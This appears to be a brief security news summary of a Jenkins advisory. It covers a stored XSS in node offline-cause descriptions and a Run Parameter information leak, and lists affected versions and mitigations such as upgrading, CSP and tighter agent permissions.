Jenkins fixes stored XSS in node offline-cause description

TL;DR — Jenkins patched a stored XSS in the node offline-cause description that allows users with node disconnect permissions to inject persistent scripts into the Jenkins dashboard.

What happened

Jenkins is the most widely-used open-source CI/CD automation server. Jenkins published a security advisory covering two core issues. The primary concern is a High-severity stored XSS where offline-cause descriptions (defined as containing HTML since Jenkins 2.483) are rendered without escaping the user-provided text for the "Mark temporarily offline" path.

The same advisory includes a Medium-severity issue where Run Parameter values can reference builds the submitting user cannot access, leaking limited build/job existence information.

Stored XSS in CI/CD dashboards is particularly impactful because the audience is typically admins and release engineers — exactly the sessions an attacker wants to hijack.

Who is impacted

• Jenkins weekly versions up to and including 2.550.
• Jenkins LTS versions up to and including 2.541.1.
• Greatest risk where users or automation have Agent/Configure or Agent/Disconnect permissions and Jenkins UI is viewed by higher-privileged users.

What to do now

• Follow vendor remediation guidance and apply the latest patched release available at the time of writing.
• Ensure your weekly/LTS track is aligned with the advisory's patched train before rollout.
• If on Jenkins 2.539+ and unable to upgrade immediately, enforce Content Security Policy (CSP) as a temporary mitigation.
• Tighten RBAC around node (agent) management permissions to reduce who can reach the vulnerable input.